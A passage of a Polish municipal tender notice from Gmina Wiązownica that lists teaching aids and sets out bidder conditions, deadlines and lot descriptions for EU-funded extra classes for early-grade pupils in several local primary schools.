13.Program multimedialny pierwsze odkrycia    		1 szt.
14.Program multimedialny wesołe miasteczko   		1 szt.
15.Program multimedialny  wyspa skarbów   		1 szt.
16.Matematyka na wesoło zestaw ćwiczeń dodawanie i odejmowanie    1 szt.
17.Małymi kroczkami   					1 szt.
18.Kropki matematyczne gra ruchowa mata z winylu 122x150    1 szt. 
19.Zegar  mata aktywności z kartkami i magnetyczne krążki 
    wraz ze znakami arytmetycznymi  				1 szt.
20.Logopedia pakiet profesjonalnego oprogramowania 
     komputerowego, multimedialne pakiety 
     logopedyczne zabawy część 1,2,3,4    			1 szt.
21.Słuchawka whisperphone   				8 szt. 
22.Turbinka logopedyczna   					8 szt.
23.Duży zestaw diagnostyczno terapeutyczny   		1 szt.
24.Logopedyczny Piotruś   					1 szt. 
25.Materiał obrazowo - wyrazowy   				16 szt.
26.Kocham czytać  18 zeszytów    				1 szt.
27.Piłki gimnastyczne   					4 szt.
28.Piłki skaczące  						2 szt. 
29.Kamyczkowa mata 					1 szt.
30.Najeżone kulki  zestaw    					1 szt.
31.Duży zestaw do balansowania  				1 szt. 
32.Jeżyk  mata korektycjnomasująca   			2 szt. 
33.Krążki sensoryczne zestaw   				1 szt.
34.Mini bramki z pachołkami zestaw   			1 szt.
35.Ariex balance pad elite poduszka równoważna   		2 szt. 
36.Koszulki zestaw   						2 szt. 
37.Tęczowe z pianki zestaw 24 szt.   				1 szt.
38.Jeżyk, papier rysunkowy A4 biały   			1 szt. 
39.Papier rysunkowy A3 biały 				1 szt.
40.Papier techniczny zestaw 10 szt.   			21 szt.
41.Papier do malowania arkusz A4   				1 szt.
42.Brystol A3 kolor   						1 szt.
43.Brystol A3 biały  						1 szt. 
44.Papier wycinankowy A4   					1 szt.
45.Nożyczki zestaw  						1 szt.
46.Sizal prasowany bez brokatu   				1 szt.
47.Sizal prasowany z brokatu   				1 szt.
48.Druciki kreatywne 10 mm.   				1 szt.
49.Druciki kreatywne 15 mm.   				1 szt.
50.Bibuła marszczona szeroka   				1 szt.
51.Farby plakatowe   						8 szt.
52.Farby akrylowe   						8 szt.
53.Farby do grafiki   						7 szt.
54.Kredki pastele   						8 szt.
55.Pędzle zestaw    						8 szt.
56.Kubki plastikowe   						8 szt.
57.Piórka indyjskie 1x8,5   					1 szt.
58.Piórka krótkie 1 zestaw    					1 szt.
59.Tablica zielona pojedyncza z gotowym nadrukiem  	1 szt.
60.Tablica biała - ecoboard   					1 szt.
61.Komplet startowy do tablic białych  			1 szt.

VII. Szkoła Podstawowa Wiązownica
1.Książeczki część 1,2    					6 szt.
2.Edusensus dyslekcja oprogramowanie   			1 szt.
3.Edusensus czytam i piszę książka    				1 szt.
4.Teatrzyk wielofunkcyjny    					1 szt.
5.Teatrzyki dziecięce książka   				1 szt.
6.Mikrofon mp3   						1 szt.
7.Płytka do pisania lini  					4 szt.
8.Słucham bajek i układam historyjkę    			1 szt.
9.Lotto dźwiękowe-sytuacje   					1 szt.
10.Analiza i synteza wzrokowa    				1 szt.
11.Bystre oczko  7 gier    					1 szt.
12.Tuba pieksi   						1 szt.
13.Waga 1,01 z odważnikami    				1 szt.
14.Warsztat filtrowania zestaw kompletny   			1 szt.
15.Eduteraprutica oprogramowanie    			1 szt.
16.Logo rymy   						4 szt.
17.Sztaluga z wałkiem do rozwijania papieru   		6 szt. 
18.Zestaw dziurkaczy z pomocnikiem   			1 szt. 
19.Karbownice do papieru   					3 szt.
20.Nożyczki zygzak   						5 szt.
21.Nożyczki wzroki   						8 szt.
22.Zestaw kreatywny filcu   					1 szt.
23.Zestaw kreatywny 1    					4 szt.
24.Szablony   							5 szt.
25.Wałki do malowania    					3 szt.
26.Wyprawka kreatywna max-  				1 szt.
27.Rolka papieru    						2 szt.
28.Karbownice do papieru 					1 szt.
29.Bloki techniczne kolorowe A3 i A4   			1 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5, 39.16.21.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie wymagał wniesienia wadium przetargowego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym  zakresie. 
Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty 
oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym  zakresie. 
Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty 
 oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym  zakresie. 
Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty 
oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za  spełniony jeżeli   dysponują  osobami zdolnymi do wykonania  zamówienia,  lub przedłożą pisemnym zobowiązaniem innych podmiotów do udostępnienia tych osób, w szczególności: 
 - dysponuje minimum jedną osobą posiadającą wykształcenie kierunkowe odpowiednie  dla rodzaju  poszczególnych zajęć stanowiących przedmiot zamówienia w danej części (1-7), zgodnie z kwalifikacjami określonymi w Rozporządzeniu Ministra Edukacji  Narodowej z dnia  03.02.2012 roku (Dz. U. z 2012r., poz. 174), w sprawie szczegółowych kwalifikacji  wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego  zakładu kształcenia nauczycieli i posiadającymi  doświadczenie pedagogiczne ( staż  pedagogiczny) minimum 2 lata pracy w szkole.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym  zakresie. 
Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty 
oświadczenia wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- formularz oferty;
- parafowany projekt umowy;
- pełnomocnictwo w przypadku wspólnego ubiegania się o udzielenie zamówienia(jeżeli dotyczy);</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany w umowie pod rygorem nieważności  muszą być dokonane w formie pisemnej.
2.	Zamawiający zgodnie z art. 144 ustawy Pzp. przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności:
1)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ.
            Przez działanie siły wyższej należy rozumieć zaistnienie zdarzenia, powstałego niezależnie 
            od  stron umowy, którego nie można było przewidzieć i któremu nie można było zapobiec 
            lub przeciwdziałać  poprzez podjęte z należytą starannością działania.
2)	zmiana obowiązującej stawki VAT,
3)	zmiana sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wiazownica.com  lub www.bip.wiazownica.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Wiązownica
37-522 Wiązownica
pok. nr 42   II p.
Cena dokumentacji przetargowej 20 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2012 godzina 09:00, miejsce: Gmina Wiązownica
37-522 Wiązownica
Sekretariat Urzędu pok. nr 42   II p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest finansowany przez Unię Europejską w ramach Programu Operacyjnego 
KAPITAŁ LUDZKI - Priorytet IX Rozwój wykształcenia i kompetencji w regionach 
Działanie 9.1.  Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty. 
Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym 
dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Wiązownicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy przeprowadzenie dodatkowych zajęć w ramach projektu      
Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Wiązownica, współfinansowanego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. 
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
    zagrożonym ryzykiem dyslekcji w łącznym  wymiarze w ilości 32 godz. 
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 8 uczniów.
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  ( 2 grupy) w 
    łącznym wymiarze  godzin w ilości 64 (2 grupyx32).
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 13 uczniów.
3. Zajęcia logopedyczne  dla dzieci z zaburzeniami rozwoju mowy łącznym wymiarze w ilości 32 
    godzin.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 5 uczniów.
4. Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych, ze szczególnym 
    uwzględnieniem nauk matematyczno - przyrodniczych w tym: prowadzenie obserwacji    
    przyrodniczych, wykonywanie doświadczeń i eksperymentów, prowadzenie hodowli i 
    obserwacje mikroskopowe, rozwijanie zainteresowań i zdolności matematycznych z 
    ukierunkowaniem do udziału w konkursach matematycznych w  łącznym wymiarze w 
    ilości 32 godzin.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 9 uczniów.
5. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych plastycznie w  
    łącznym wymiarze  w ilości 32 godzin.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 12 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Szówsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy przeprowadzenie dodatkowych zajęć w ramach projektu      
Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Wiązownica, współfinansowanego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. 

1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
    zagrożonym ryzykiem dyslekcji w łącznym  wymiarze w ilości 40 godz. 
    Termin    realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 8 uczniów.
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w łącznym 
    wymiarze w ilości 40 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 8 uczniów.
3. Zajęcia logopedyczne  dla dzieci z zaburzeniami rozwoju mowy łącznym wymiarze w ilości 80 
    godzin (2 grupy x40 godz.).
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 8 uczniów.
4. Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze w ilości 40 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 7 uczniów.
 5. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
    uwzględnieniem umiejętności plastycznych i technicznych w  łącznym wymiarze  w  ilości 40 
    godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 8 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Piwodzie (wraz z filią w Cetuli).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy przeprowadzenie dodatkowych zajęć w ramach projektu      
Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Wiązownica, współfinansowanego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. 
Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli) 
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
    zagrożonym ryzykiem dyslekcji w łącznym  wymiarze w ilości 35 godz. 
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 7 uczniów.
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w łącznym     
    wymiarze  w ilości 35 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 6 uczniów.
3. Zajęcia logopedyczne  dla dzieci z zaburzeniami rozwoju mowy łącznym wymiarze  w 
    ilości 80 godzin (2 grupy x40 godz.).
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 14 uczniów.
4. Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze w ilości 
    120 godz. ( 3 grupyx40 godz.)
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 28 uczniów.
5. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
    uwzględnieniem  umiejętności teatralnych w  łącznym wymiarze  w ilości 35 godzin.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 9 uczniów.
6. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
    uwzględnieniem  umiejętności  plastycznych w  łącznym wymiarze  w ilości 35 godzin.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 9 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Ryszkowej Woli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy przeprowadzenie dodatkowych zajęć w ramach projektu      
Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Wiązownica, współfinansowanego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. 
Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Ryszkowej Woli 
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
    zagrożonym ryzykiem dyslekcji w łącznym  wymiarze w ilości 90 godz. ( 3 grupy)    
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 11 uczniów.
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w łącznym 
    wymiarze w ilości 60 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 6 uczniów.
3. Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze w ilości 30 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 3 uczniów.
4. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
    uwzględnieniem  nauk matematyczno - przyrodniczych, np. prowadzenie obserwacji   
    przyrodniczych w  łącznym wymiarze  w ilości 30 godzin.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 4 uczniów.
5. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
    uwzględnieniem  umiejętności artystycznych, w  łącznym wymiarze w ilości 30 godzin.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 5 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Zapałowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy przeprowadzenie dodatkowych zajęć w ramach projektu      
Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Wiązownica, współfinansowanego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. 
Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Zapałowie
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
    zagrożonym ryzykiem dyslekcji w łącznym  wymiarze w ilości 90 godz. ( 3 grupy)  godz. 
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 22 uczniów.
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w łącznym 
    wymiarze  godzin w ilości 60 godz. ( 2 grupy)
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 9 uczniów.
3. zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy  ( 2 grupy) w łącznym  
    wymiarze godzin w ilości 60 godz. ( 2x30 godz.)
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 9 uczniów.
4. Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji 
    społecznej w łącznym  wymiarze  w ilości 30 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 4 uczniów.
5. Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze w ilości 30 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 10 uczniów.
6. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
    uwzględnieniem  umiejętności plastycznych, w  łącznym wymiarze w ilości 30 godzin.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 5 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Manasterzu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy przeprowadzenie dodatkowych zajęć w ramach projektu      
